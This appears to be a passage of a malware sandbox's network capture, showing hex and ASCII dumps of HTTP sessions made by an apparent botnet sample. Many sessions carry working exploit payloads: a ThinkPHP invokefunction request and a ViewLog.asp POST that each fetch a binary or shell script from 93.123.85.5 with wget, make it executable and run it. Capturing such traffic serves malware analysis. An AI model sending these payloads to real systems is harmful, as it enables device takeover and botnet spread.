09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 30 30 30 2d 30 31 66 4d 45 34 30 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68
                                                              Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Mon, 13 Nov 2023 21:19:49 GMT<br><span class="F">IP: 156.146.49.168</span>Node information: PS-000-01fME40<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp Th
                                                              Nov 13, 2023 22:19:49.210619926 CET13499INData Raw: 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 36 35 35 32 39 32 66 35 5f 50 53 2d 30 30 30 2d 30 31 66 4d 45 34 30 5f 31 31 30 36 37 2d 31 36 35 37 30 0a
                                                              Data Ascii: inkPHP ; rm -rf thinkphp'<br>Request-Id: 655292f5_PS-000-01fME40_11067-16570<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class="hide_me P H"><div class="K">ERROR</div><p c
                                                              Nov 13, 2023 22:19:49.210633993 CET13499INData Raw: 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 52 61 6e 67 65 20 49 6e 76 61 6c 69 64 3c 2f 6c 69 3e 3c
                                                              Data Ascii: n hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return document.getElementById(i);
                                                              Nov 13, 2023 22:19:49.313513041 CET13502INData Raw: 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 52 61 6e 67 65 20 49 6e 76 61 6c 69 64 3c 2f 6c 69 3e 3c
                                                              Data Ascii: n hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return document.getElementById(i);
                                                              Nov 13, 2023 22:19:49.512516975 CET13505INData Raw: 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 52 61 6e 67 65 20 49 6e 76 61 6c 69 64 3c 2f 6c 69 3e 3c
                                                              Data Ascii: n hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">function e(i) {return document.getElementById(i);


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              685192.168.2.2358996112.125.214.11380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:49.516149998 CET13506OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:49.830899000 CET13603INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:19:47 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              686192.168.2.2347052112.127.1.13780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:49.516539097 CET13507OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:49.832091093 CET13605INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:19:49 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              687192.168.2.2355010112.29.221.3080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:49.934113979 CET13616OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:52.070817947 CET13897OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:52.490874052 CET13908INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:52 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 206
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 79 64 2d 61 6e 68 75 69 2d 68 75 61 69 6e 61 6e 2d 32 38 2d 31 31 32 2d 32 39 2d 32 32 31 2d 33 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>yd-anhui-huainan-28-112-29-221-30</center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              688192.168.2.234885495.86.67.128080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:50.102806091 CET13621OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              689192.168.2.2355030112.29.221.3080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:50.267107010 CET13627OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:50.691927910 CET13670INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:50 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 206
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 79 64 2d 61 6e 68 75 69 2d 68 75 61 69 6e 61 6e 2d 32 38 2d 31 31 32 2d 32 39 2d 32 32 31 2d 33 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>yd-anhui-huainan-28-112-29-221-30</center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              69192.168.2.233945031.12.82.408080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.061419964 CET2576OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:20.391372919 CET2584INHTTP/1.1 308 Permanent Redirect
                                                              Location: https://192.168.0.14/cgi-bin/ViewLog.asp
                                                              Date: Mon, 13 Nov 2023 21:18:20 GMT
                                                              Content-Length: 18
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 50 65 72 6d 61 6e 65 6e 74 20 52 65 64 69 72 65 63 74
                                                              Data Ascii: Permanent Redirect


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              690192.168.2.235647462.131.141.1858080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:50.423469067 CET13630OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:50.746824026 CET13732INHTTP/1.0 404 Not Found
                                                              Server: http server 1.0
                                                              Content-type: text/html
                                                              Date: Mon, 13 Nov 2023 21:19:40 GMT
                                                              Last-modified: Mon, 13 Nov 2023 21:19:40 GMT
                                                              Accept-Ranges: bytes
                                                              Connection: close
                                                              Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 20 75 72 6c 28 27 2f 63 67 69 2d 62 69 6e 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 2f 65 72 72 5f 62 67 2e 6a 70 67 27 29 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 6c 69 6e 6b 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 76 69 73 69 74 65 64 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 31 7b 0a 77 69 64 74 68 3a 20 39 38 30 70 78 3b 0a 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 42 43 42 43 42 43 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 5f 69 6d 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><link rel="shortcut icon" href="/images/favicon.gif" type="image/gif" /><link rel="icon" href="/images/favicon.gif" type="image/gif" /><style type="text/css">body{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;background: #FFFFFF url('/cgi-bin/images/error/err_bg.jpg');overflow: hidden;color: #A4A3A3;text-align: center;}.qnap_hyperlink a,.qnap_hyperlink a:link,.qnap_hyperlink a:visited{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;color: #A4A3A3;}.qnap_bar1{width: 980px;border-bottom: 1px solid #BCBCBC;padding-top: 10px;text-align: left;margin: 0 auto;}.qnap_bar_img{padding-bottom:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              691192.168.2.235487031.136.126.1398080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:50.430871964 CET13630OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:51.430919886 CET13784OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:53.414666891 CET14033OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:57.510162115 CET14513OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:05.449064016 CET15558OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:21.315018892 CET17537OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
